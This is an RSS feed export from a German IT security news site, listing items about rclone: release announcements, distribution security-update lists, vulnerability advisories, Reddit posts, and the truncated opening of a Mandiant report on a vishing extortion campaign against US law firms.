<?xml version="1.0" encoding="UTF-8" ?>
<?xml-stylesheet type="text/xsl" href="/rss-style.xsl"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:media="http://search.yahoo.com/mrss/" xmlns:dc="http://purl.org/dc/elements/1.1/">
<channel>
<title><![CDATA[Team IT Security - 📰 Alle Kategorien]]></title>
<link><![CDATA[https://tsecurity.de/export/rss/alle-kategorien.xml?q=rclone+v1743%2F]]></link>
<description><![CDATA[Das Gesamte Cyber Threat Intelligence Feed-Archiv von TSecurity.de. Alle Nachrichten, Sicherheitsmeldungen, Videos, Downloads und Analysen in einer zentralen Übersicht.]]></description>
<language>de-DE</language>
<lastBuildDate>Tue, 28 Jul 2026 16:14:48 +0200</lastBuildDate>
<pubDate>Tue, 28 Jul 2026 16:14:48 +0200</pubDate>
<ttl>15</ttl>
<copyright>2026 Team IT Security</copyright>
<managingEditor>lakandor@tsecurity.de (Horus Sirius)</managingEditor>
<webMaster>lakandor@tsecurity.de (Horus Sirius)</webMaster>
<category>IT Security</category>
<category>Cybersecurity</category>
<category>Nachrichten</category>
<generator>Team IT Security RSS Generator v2.0</generator>
<image>
<url>https://tsecurity.de/favicon.ico</url>
<title><![CDATA[Team IT Security - 📰 Alle Kategorien]]></title>
<link><![CDATA[https://tsecurity.de/export/rss/alle-kategorien.xml?q=rclone+v1743%2F]]></link>
</image>
<atom:link href="https://tsecurity.de/export/rss/it-security.xml?q=rclone+v1743%2F" rel="self" type="application/rss+xml" />
<item>
<title><![CDATA[Anyone here using Proton Drive as their primary cloud storage on Fedora?]]></title>
<description><![CDATA[Has anyone here completely switched to Proton Drive on Fedora as their primary cloud storage? I'm curious how you're handling things like: automatic sync large file transfers backups rclone vs the official CLI overall reliability I've been digging into Proton Drive's Linux architecture and wrote ...]]></description>
<link>https://tsecurity.de/de/3678775/linux-tipps/anyone-here-using-proton-drive-as-their-primary-cloud-storage-on-fedora/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3678775/linux-tipps/anyone-here-using-proton-drive-as-their-primary-cloud-storage-on-fedora/</guid>
<pubDate>Sun, 19 Jul 2026 04:54:39 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>Has anyone here completely switched to Proton Drive on Fedora as their primary cloud storage?</p> <p>I'm curious how you're handling things like:</p> <p>automatic sync</p> <p>large file transfers</p> <p>backups</p> <p>rclone vs the official CLI</p> <p>overall reliability</p> <p>I've been digging into Proton Drive's Linux architecture and wrote up my findings if anyone's interested: <a href="https://hintnal.com/articles/proton-drive-on-linux-2026-complete-technical-guide-for-power-users">Proton Dive on Linux </a></p> <p>I'd love to hear how other Fedora users have set up their workflow.</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/the_nazar"> /u/the_nazar </a> <br> <span><a href="https://www.reddit.com/r/linux/comments/1v0ch1y/anyone_here_using_proton_drive_as_their_primary/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1v0ch1y/anyone_here_using_proton_drive_as_their_primary/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Monday]]></title>
<description><![CDATA[Security updates have been issued by Debian (chromium, libxfont, mesa, opam, and wireless-regdb), Fedora (acl, attr, chromium, cjson, composer, docker-compose, jfrog-cli, librabbitmq, libssh2, libXfont2, log4cxx, OpenImageIO, openssh, p11-kit, perl-Crypt-DSA, perl-HTML-Gumbo, prometheus, python-d...]]></description>
<link>https://tsecurity.de/de/3665263/linux-tipps/security-updates-for-monday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3665263/linux-tipps/security-updates-for-monday/</guid>
<pubDate>Mon, 13 Jul 2026 14:41:08 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>Debian</b> (chromium, libxfont, mesa, opam, and wireless-regdb), <b>Fedora</b> (acl, attr, chromium, cjson, composer, docker-compose, jfrog-cli, librabbitmq, libssh2, libXfont2, log4cxx, OpenImageIO, openssh, p11-kit, perl-Crypt-DSA, perl-HTML-Gumbo, prometheus, python-dulwich, python-idna, python-pillow, python-tornado, sssd, tmux, upower, webkitgtk, xorg-x11-server, and xorg-x11-server-Xwayland), <b>Mageia</b> (libarchive and vim), <b>Oracle</b> (389-ds:1.4, buildah, cups, edk2, freerdp, golang, grafana, gstreamer1-plugins-bad-free, gstreamer1-plugins-good, gstreamer1-plugins-ugly-free, kernel, libexif, libsolv, libtasn1, libxml2, nginx:1.24, nginx:1.26, nodejs:22, nodejs:24, oci-seccomp-bpf-hook, podman, postgresql:18, python-urllib3, tigervnc, tomcat, unbound, and xorg-x11-server), <b>Slackware</b> (p11-kit), and <b>SUSE</b> (agama, dash, dracut, flannel, go1.26, gsasl, gstreamer-plugins-good, ImageMagick, imagemagick, kernel, krb5, krb5, krb5-mini, libIex-3_4-33, libmbedtls23, libxfont2, nasm, nghttp2, perl-CGI-Session, perl-dbi, perl-List-SomeUtils-XS, python-pillow, python-social-auth-app-django, python-urllib3, python313-Django4, python313-Django6, python313-pytest-html, python313-sqlparse, python313-websockets, rclone, rust-keylime, rustup, sccache, spectre-meltdown-checker, sssd, terraform-provider-aws, terraform-provider-azurerm, terraform-provider-external, terraform-provider-google, terraform-provider-helm, terraform-provider-kubernetes, terraform-provid, thunderbird, tiff, traefik2, xorg-x11-server, and xwayland).]]></content:encoded>
</item>
<item>
<title><![CDATA[[NEU] [hoch] rclone: Mehrere Schwachstellen]]></title>
<description><![CDATA[Ein entfernter, authentisierter Angreifer kann mehrere Schwachstellen in rclone ausnutzen, um beliebige Dateien zu lesen und zu schreiben, sowie Informationen offenzulegen und Sicherheitsmechanismen zu umgehen.]]></description>
<link>https://tsecurity.de/de/3656783/it-security-nachrichten/neu-hoch-rclone-mehrere-schwachstellen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3656783/it-security-nachrichten/neu-hoch-rclone-mehrere-schwachstellen/</guid>
<pubDate>Thu, 09 Jul 2026 13:08:13 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Ein entfernter, authentisierter Angreifer kann mehrere Schwachstellen in rclone ausnutzen, um beliebige Dateien zu lesen und zu schreiben, sowie Informationen offenzulegen und Sicherheitsmechanismen zu umgehen.]]></content:encoded>
</item>
<item>
<title><![CDATA[Mehrere Probleme in rclone (Fedora)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3642223/it-security-nachrichten/mehrere-probleme-in-rclone-fedora/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3642223/it-security-nachrichten/mehrere-probleme-in-rclone-fedora/</guid>
<pubDate>Thu, 02 Jul 2026 22:38:52 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
</item>
<item>
<title><![CDATA[Security updates for Thursday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (giflib, kernel, mariadb:10.11, mod_http2, php, rrdtool, ruby, ruby:3.3, and ruby:4.0), Debian (jq and node-lodash), Fedora (caddy, hut, ipp-usb, kernel, opkssh, rclone, thunderbird, and transmission), SUSE (389-ds, 7zip, alsa, amazon-ecs-init, avahi...]]></description>
<link>https://tsecurity.de/de/3641315/linux-tipps/security-updates-for-thursday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3641315/linux-tipps/security-updates-for-thursday/</guid>
<pubDate>Thu, 02 Jul 2026 15:24:56 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (giflib, kernel, mariadb:10.11, mod_http2, php, rrdtool, ruby, ruby:3.3, and ruby:4.0), <b>Debian</b> (jq and node-lodash), <b>Fedora</b> (caddy, hut, ipp-usb, kernel, opkssh, rclone, thunderbird, and transmission), <b>SUSE</b> (389-ds, 7zip, alsa, amazon-ecs-init, avahi, cadvisor, cosign, cups, dnsdist, docker, dracut, firefox, firewalld, giflib, glib-networking, glycin-loaders, google-cloud-sap-agent, google-guest-agent, gsasl, hauler, helm, ImageMagick, kernel, keylime, krb5, libaom, libexif, libgcrypt, libnfs, libssh2_org, loupe, lrzip, mutt, ncurses, nodejs22, openCryptoki, openssh, openssl-3, pacemaker, perl-Config-IniFiles, perl-CSS-Minifier-XS, perl-DBI, perl-JavaScript-Minifier-XS, perl-libwww-perl, postfix, python-click, python-idna, python-Markdown, python-joblib, python-handy-archives, python-apache-libcloud, python-WebOb, python-PyGithub, python-soupsieve, python-pip, python-pytest-html, python-python-dotenv, python-python-multipart, python-starlette, python-tornado6, python-zeroconf, python311, python311-jupyter-server, rpcbind, sed, sg3_utils, tar, tiff, and util-linux), and <b>Ubuntu</b> (kernel, linux, linux-aws, linux-aws-5.15, linux-aws-fips, linux-azure, linux-azure-5.15, linux-azure-fde-5.15, linux-fips, linux-gcp, linux-gcp-fips, linux-gke, linux-gkeop, linux-hwe-5.15, linux-ibm, linux-ibm-5.15, linux-intel-iot-realtime, linux-intel-iotg, linux-kvm, linux-lowlatency, linux-lowlatency-hwe-5.15, linux-nvidia, linux-nvidia-tegra, linux-nvidia-tegra-5.15, linux-nvidia-tegra-igx, linux-oracle, linux-realtime, linux, linux-aws, linux-aws-fips, linux-gcp, linux-gcp-fips, linux-ibm, linux-nvidia, linux-nvidia-6.8, linux-oracle, linux-realtime, linux-realtime-6.8, linux-oem-6.17, and linux-oem-7.0).]]></content:encoded>
</item>
<item>
<title><![CDATA[Security: Mehrere Probleme in rclone (Fedora)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3640150/unix-server/security-mehrere-probleme-in-rclone-fedora/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3640150/unix-server/security-mehrere-probleme-in-rclone-fedora/</guid>
<pubDate>Thu, 02 Jul 2026 07:02:04 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[ ]]></content:encoded>
</item>
<item>
<title><![CDATA[INC Ransomware Uses LOLBins, RMM Tools, and rclone for Network Intrusion and Data Exfiltration]]></title>
<description><![CDATA[The cybersecurity landscape faces a growing threat from INC ransomware, a highly active Ransomware-as-a-Service (RaaS) group that has claimed over 800 victims globally since its emergence in mid-2023. Known for its aggressive double-extortion tactics, INC primarily targets high-profile organizati...]]></description>
<link>https://tsecurity.de/de/3609582/it-security-nachrichten/inc-ransomware-uses-lolbins-rmm-tools-and-rclone-for-network-intrusion-and-data-exfiltration/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3609582/it-security-nachrichten/inc-ransomware-uses-lolbins-rmm-tools-and-rclone-for-network-intrusion-and-data-exfiltration/</guid>
<pubDate>Fri, 19 Jun 2026 09:08:56 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The cybersecurity landscape faces a growing threat from INC ransomware, a highly active Ransomware-as-a-Service (RaaS) group that has claimed over 800 victims globally since its emergence in mid-2023. Known for its aggressive double-extortion tactics, INC primarily targets high-profile organizations in the United States, specifically focusing on the legal, manufacturing, technology, and healthcare sectors. The group’s […]</p>
<p>The post <a href="https://cyberpress.org/inc-ransomware-exfiltrates-data/">INC Ransomware Uses LOLBins, RMM Tools, and rclone for Network Intrusion and Data Exfiltration</a> appeared first on <a href="https://cyberpress.org/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Friday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (.NET 10.0, .NET 8.0, .NET 9.0, bind, expat, httpd:2.4, kernel, kernel-rt, mod_http2, openssl, poppler, redis, redis:7, samba, and unbound), Debian (ironic, kernel-wedge, libinput, linux-base, and neutron), Fedora (kernel, openssl, vaultwarden, and v...]]></description>
<link>https://tsecurity.de/de/3593601/linux-tipps/security-updates-for-friday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3593601/linux-tipps/security-updates-for-friday/</guid>
<pubDate>Fri, 12 Jun 2026 15:22:47 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (.NET 10.0, .NET 8.0, .NET 9.0, bind, expat, httpd:2.4, kernel, kernel-rt, mod_http2, openssl, poppler, redis, redis:7, samba, and unbound), <b>Debian</b> (ironic, kernel-wedge, libinput, linux-base, and neutron), <b>Fedora</b> (kernel, openssl, vaultwarden, and vaultwarden-web), <b>Mageia</b> (erlang-hex_core, erlang-rebar3, gnupg2, and sqlite3), <b>Red Hat</b> (buildah, podman, and skopeo), <b>SUSE</b> (flannel, gdk-pixbuf-loader-libheif, gnutls, google-cloud-sap-agent, grafana, graphite2, hplip, libIex-3_4-33, libzypp, nginx, openssh, perl-DBI, perl-Git-Repository, perl-Protocol-HTTP2, python-Pygments, python-simpleeval, python311-Django4, rclone, roundcubemail, strongswan, tomcat10, tomcat11, unbound, and webkit2gtk3), and <b>Ubuntu</b> (apache2, dotnet8, dotnet9, dotnet10, gst-plugins-base1.0, ironic, linux-azure-5.15, linux-azure-fips, lwip, mistral, and ubuntu-kylin-software-center).]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Thursday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (.NET 10.0, .NET 8.0, .NET 9.0, podman, poppler, and postgresql-jdbc), Debian (chromium, jackson-core, libdbi-perl, and libinput), Fedora (httpd, rust, and xmlstarlet), Mageia (openssh, postfix, and roundcubemail), Oracle (frr, kernel, libyang, n, po...]]></description>
<link>https://tsecurity.de/de/3590726/linux-tipps/security-updates-for-thursday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3590726/linux-tipps/security-updates-for-thursday/</guid>
<pubDate>Thu, 11 Jun 2026 15:26:36 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (.NET 10.0, .NET 8.0, .NET 9.0, podman, poppler, and postgresql-jdbc), <b>Debian</b> (chromium, jackson-core, libdbi-perl, and libinput), <b>Fedora</b> (httpd, rust, and xmlstarlet), <b>Mageia</b> (openssh, postfix, and roundcubemail), <b>Oracle</b> (frr, kernel, libyang, n, postgresql-jdbc, and unbound), <b>Red Hat</b> (.NET 10.0, .NET 8.0, .NET 9.0, redis, and redis:7), <b>SUSE</b> (agama-web-ui, cockpit, cosign, glibc, google-cloud-sap-agent, google-osconfig-agent, kanidm, kernel, kubernetes, kubernetes1.23, kubernetes1.24, kubernetes1.25, kubernetes1.27, kubernetes1.28, libpodofo-devel, libyang, NetworkManager-libreswan, openCryptoki, python311-pypdf, rclone, steampipe, wicked, and xen), and <b>Ubuntu</b> (exim4, libcrypt-saltedhash-perl, libhttp-daemon-perl, samba, and uriparser).]]></content:encoded>
</item>
<item>
<title><![CDATA[[NEU] [hoch] rclone: Schwachstelle ermöglicht Ausführen von beliebigem Programmcode mit Benutzerrechten]]></title>
<description><![CDATA[Ein entfernter, anonymer Angreifer kann eine Schwachstelle in rclone ausnutzen, um je nach rclone-Version beliebigen Code mit Benutzerrechten auszuführen, vertrauliche Informationen offenzulegen oder Daten zu manipulieren.]]></description>
<link>https://tsecurity.de/de/3581012/it-security-nachrichten/neu-hoch-rclone-schwachstelle-ermoeglicht-ausfuehren-von-beliebigem-programmcode-mit-benutzerrechten/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3581012/it-security-nachrichten/neu-hoch-rclone-schwachstelle-ermoeglicht-ausfuehren-von-beliebigem-programmcode-mit-benutzerrechten/</guid>
<pubDate>Mon, 08 Jun 2026 11:52:33 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Ein entfernter, anonymer Angreifer kann eine Schwachstelle in rclone ausnutzen, um je nach rclone-Version beliebigen Code mit Benutzerrechten auszuführen, vertrauliche Informationen offenzulegen oder Daten zu manipulieren.]]></content:encoded>
</item>
<item>
<title><![CDATA[rclone v1.73.0]]></title>
<description><![CDATA[This is the v1.73.0 release of rclone.
Full details of the changes can be found in the changelog.]]></description>
<link>https://tsecurity.de/de/3580050/tools/rclone-v1730/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3580050/tools/rclone-v1730/</guid>
<pubDate>Sun, 07 Jun 2026 23:24:15 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>This is the v1.73.0 release of rclone.</p>
<p>Full details of the changes can be found in <a href="https://rclone.org/changelog/#v1-73-0-2026-01-30" rel="nofollow">the changelog</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[rclone v1.73.1]]></title>
<description><![CDATA[This is the v1.73.1 release of rclone.
Full details of the changes can be found in the changelog.]]></description>
<link>https://tsecurity.de/de/3580049/tools/rclone-v1731/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3580049/tools/rclone-v1731/</guid>
<pubDate>Sun, 07 Jun 2026 23:24:13 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>This is the v1.73.1 release of rclone.</p>
<p>Full details of the changes can be found in <a href="https://rclone.org/changelog/#v1-73-1-2026-02-17" rel="nofollow">the changelog</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[rclone v1.73.2]]></title>
<description><![CDATA[This is the v1.73.2 release of rclone.
Full details of the changes can be found in the changelog.]]></description>
<link>https://tsecurity.de/de/3580048/tools/rclone-v1732/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3580048/tools/rclone-v1732/</guid>
<pubDate>Sun, 07 Jun 2026 23:24:12 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>This is the v1.73.2 release of rclone.</p>
<p>Full details of the changes can be found in <a href="https://rclone.org/changelog/#v1-73-2-2026-03-06" rel="nofollow">the changelog</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[rclone v1.73.3]]></title>
<description><![CDATA[This is the v1.73.3 release of rclone.
Full details of the changes can be found in the changelog.]]></description>
<link>https://tsecurity.de/de/3580047/tools/rclone-v1733/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3580047/tools/rclone-v1733/</guid>
<pubDate>Sun, 07 Jun 2026 23:24:11 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>This is the v1.73.3 release of rclone.</p>
<p>Full details of the changes can be found in <a href="https://rclone.org/changelog/#v1-73-3-2026-03-23" rel="nofollow">the changelog</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[rclone v1.73.4]]></title>
<description><![CDATA[This is the v1.73.4 release of rclone.
Full details of the changes can be found in the changelog.]]></description>
<link>https://tsecurity.de/de/3580046/tools/rclone-v1734/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3580046/tools/rclone-v1734/</guid>
<pubDate>Sun, 07 Jun 2026 23:24:10 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>This is the v1.73.4 release of rclone.</p>
<p>Full details of the changes can be found in <a href="https://rclone.org/changelog/#v1-73-4-2026-04-08" rel="nofollow">the changelog</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[rclone v1.73.5]]></title>
<description><![CDATA[This is the v1.73.5 release of rclone.
Full details of the changes can be found in the changelog.]]></description>
<link>https://tsecurity.de/de/3580045/tools/rclone-v1735/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3580045/tools/rclone-v1735/</guid>
<pubDate>Sun, 07 Jun 2026 23:24:08 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>This is the v1.73.5 release of rclone.</p>
<p>Full details of the changes can be found in <a href="https://rclone.org/changelog/#v1-73-5-2026-04-19" rel="nofollow">the changelog</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[rclone v1.74.0]]></title>
<description><![CDATA[This is the v1.74.0 release of rclone.
Full details of the changes can be found in the changelog.]]></description>
<link>https://tsecurity.de/de/3580044/tools/rclone-v1740/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3580044/tools/rclone-v1740/</guid>
<pubDate>Sun, 07 Jun 2026 23:24:07 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>This is the v1.74.0 release of rclone.</p>
<p>Full details of the changes can be found in <a href="https://rclone.org/changelog/#v1-74-0-2026-05-01" rel="nofollow">the changelog</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[rclone v1.74.1]]></title>
<description><![CDATA[This is the v1.74.1 release of rclone.
Full details of the changes can be found in the changelog.]]></description>
<link>https://tsecurity.de/de/3580043/tools/rclone-v1741/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3580043/tools/rclone-v1741/</guid>
<pubDate>Sun, 07 Jun 2026 23:24:05 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>This is the v1.74.1 release of rclone.</p>
<p>Full details of the changes can be found in <a href="https://rclone.org/changelog/#v1-74-1-2026-05-08" rel="nofollow">the changelog</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[rclone v1.74.2]]></title>
<description><![CDATA[This is the v1.74.2 release of rclone.
Full details of the changes can be found in the changelog.]]></description>
<link>https://tsecurity.de/de/3580042/tools/rclone-v1742/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3580042/tools/rclone-v1742/</guid>
<pubDate>Sun, 07 Jun 2026 23:24:04 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>This is the v1.74.2 release of rclone.</p>
<p>Full details of the changes can be found in <a href="https://rclone.org/changelog/#v1-74-2-2026-05-22" rel="nofollow">the changelog</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[rclone v1.74.3]]></title>
<description><![CDATA[This is the v1.74.3 release of rclone.
Full details of the changes can be found in the changelog.]]></description>
<link>https://tsecurity.de/de/3580041/tools/rclone-v1743/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3580041/tools/rclone-v1743/</guid>
<pubDate>Sun, 07 Jun 2026 23:24:03 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>This is the v1.74.3 release of rclone.</p>
<p>Full details of the changes can be found in <a href="https://rclone.org/changelog/#v1-74-3-2026-06-05" rel="nofollow">the changelog</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Rclone – Das ultimative Terminal-Tool für Backups, Synchronisation und Verschlüsselung mit Google Drive, OneDrive & Co. unter Linux]]></title>
<description><![CDATA[Hallo zusammen, wer nach einer zuverlässigen Methode sucht, um seine Linux-Daten in die Cloud (wie Google Drive, OneDrive, Dropbox oder S3) zu sichern, sollte sich unbedingt Rclone ansehen. Es wird oft als das „Schweizer Taschenmesser für Cloud-Speicher“ bezeichnet und läuft komplett im Terminal....]]></description>
<link>https://tsecurity.de/de/3580036/it-security-nachrichten/rclone-das-ultimative-terminal-tool-fuer-backups-synchronisation-und-verschluesselung-mit-google-drive-onedrive-co-unter-linux/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3580036/it-security-nachrichten/rclone-das-ultimative-terminal-tool-fuer-backups-synchronisation-und-verschluesselung-mit-google-drive-onedrive-co-unter-linux/</guid>
<pubDate>Sun, 07 Jun 2026 23:23:31 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<table> <tr><td> <a href="https://www.reddit.com/r/Computersicherheit/comments/1tzo4tl/rclone_das_ultimative_terminaltool_f%C3%BCr_backups/"> <img src="https://external-preview.redd.it/igwavABX5pg6UUD6yDPBbxlhTK4Bd3gIKOb6p2XLIM0.png?width=640&amp;crop=smart&amp;auto=webp&amp;s=ceb1dbc27b713c023b5fda7433c6d0252877ab4b" alt="Rclone – Das ultimative Terminal-Tool für Backups, Synchronisation und Verschlüsselung mit Google Drive, OneDrive &amp; Co. unter Linux" title="Rclone – Das ultimative Terminal-Tool für Backups, Synchronisation und Verschlüsselung mit Google Drive, OneDrive &amp; Co. unter Linux"> </a> </td><td> <!-- SC_OFF --><div class="md"><p>Hallo zusammen,</p> <p>wer nach einer zuverlässigen Methode sucht, um seine Linux-Daten in die Cloud (wie Google Drive, OneDrive, Dropbox oder S3) zu sichern, sollte sich unbedingt <strong>Rclone</strong> ansehen. Es wird oft als das „Schweizer Taschenmesser für Cloud-Speicher“ bezeichnet und läuft komplett im Terminal.</p> <p><strong>Die wichtigsten Vorteile im Überblick:</strong></p> <ul> <li><strong>Riesige Auswahl:</strong> Unterstützt über 70 Cloud-Anbieter und Standard-Protokolle wie SFTP, FTP und WebDAV.</li> <li><strong>Sichere Daten:</strong> Zeitstempel bleiben erhalten und MD5/SHA1-Hashes garantieren, dass keine Datei beschädigt wird.</li> <li><strong>Schlaues Synchronisieren:</strong> Bietet echte Einweg-Synchronisation (Sync), Zweiwege-Abgleich (Bisync) und Bandbreiten-Limits.</li> <li><strong>Verschlüsselung:</strong> Dateien können direkt beim Hochladen lokal verschlüsselt werden, bevor sie in der Cloud landen.</li> <li><strong>Einbinden als Laufwerk:</strong> Jeder Cloud-Speicher lässt sich wie eine normale lokale Festplatte im System einhängen (Mount).</li> </ul> <p>Das Tool ist komplett kostenlos, Open-Source und extrem ressourcensparend.</p> <p><strong>Link:</strong> <a href="https://rclone.org/">rclone.org</a> / <a href="https://github.com/rclone/rclone">RClone auf Github</a></p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/Altruistic_Level9640"> /u/Altruistic_Level9640 </a> <br> <span><a href="https://rclone.org/">[link]</a></span>   <span><a href="https://www.reddit.com/r/Computersicherheit/comments/1tzo4tl/rclone_das_ultimative_terminaltool_f%C3%BCr_backups/">[comments]</a></span> </td></tr></table>]]></content:encoded>
</item>
<item>
<title><![CDATA[Seeking Counsel: Ongoing Targeted Campaign Against US Law Firms]]></title>
<description><![CDATA[Written by: Chad Reams, Tufail Ahmed, Keith Knapp, Ashley Frazer, Tyler McLellan

Introduction 
From January through May 2026, Mandiant identified a financially motivated data theft extortion campaign executed by the threat cluster UNC3753 (also tracked as "Luna Moth," “Chatty Spider,” and "Silen...]]></description>
<link>https://tsecurity.de/de/3575692/it-security-nachrichten/seeking-counsel-ongoing-targeted-campaign-against-us-law-firms/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3575692/it-security-nachrichten/seeking-counsel-ongoing-targeted-campaign-against-us-law-firms/</guid>
<pubDate>Fri, 05 Jun 2026 16:39:57 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="block-paragraph_advanced"><p>Written by: Chad Reams, Tufail Ahmed, Keith Knapp, Ashley Frazer, Tyler McLellan</p>
<hr></div>
<div class="block-paragraph_advanced"><h3><span>Introduction</span><strong> </strong></h3>
<p><span>From January through May 2026, Mandiant identified a financially motivated data theft extortion campaign executed by the threat cluster UNC3753 (also tracked as "Luna Moth," “Chatty Spider,” and "Silent Ransom Group") targeting dozens of organizations across professional, legal, and financial services in the United States.</span></p>
<p><span>UNC3753 leverages voice phishing (vishing) and social engineering deception techniques to achieve remote access into corporate environments. Using pretexts such as data migration or invoice related emails, the threat actors initiate phone conversations posing as IT support and convince targets to host screen-sharing sessions and download remote monitoring and management (RMM) utilities. Once inside the environment, the threat actors either directly conduct searches to locate and exfiltrate highly sensitive data, or manipulate the victim into executing these actions on their behalf. This data typically includes proprietary legal agreements, personally identifiable information (PII), and financial records for subsequent extortion demands.</span></p>
<p><span>Notably, in instances possibly linked to UNC3753, threat actors have accessed victims' systems in person. </span><a href="https://www.ic3.gov/CSA/2026/260526.pdf" rel="noopener" target="_blank"><span>In these physical incidents</span></a><span>, individuals posing as IT technicians entered corporate offices to attempt direct exfiltration of data from an endpoint using USB storage media. </span></p>
<p><span>This blog post details the threat group's technical lifecycle across recent Mandiant Consulting incident response engagements, highlights tactics like physical office targeting, and provides actionable recommendations to safeguard endpoints and infrastructure.</span></p>
<h3><span>Threat Detail</span></h3>
<p><span>The UNC3753 campaign lifecycle reflects an optimized, fast-tempo operational model. In many Mandiant investigated incidents, the entire attack sequence—from initial target contact to data theft and extortion—occurred within a single business day. Recently, Mandiant observed data searches, staging, and theft initiated in under an hour. </span></p>
<p><span>The threat group frequently initializes campaigns using benign, invoice-themed email lures sent from actor-controlled consumer email accounts. These messages contain no active links or malicious attachments. Instead, they typically contain a brief, generic message for example: “hello, here is the invcoie we talked about yesterday”. Google Threat Intelligence Group (GTIG) assesses that the primary purpose of these emails is to establish a pretext, raising the target's internal security concerns so they are more susceptible to follow-up voice calls.</span></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
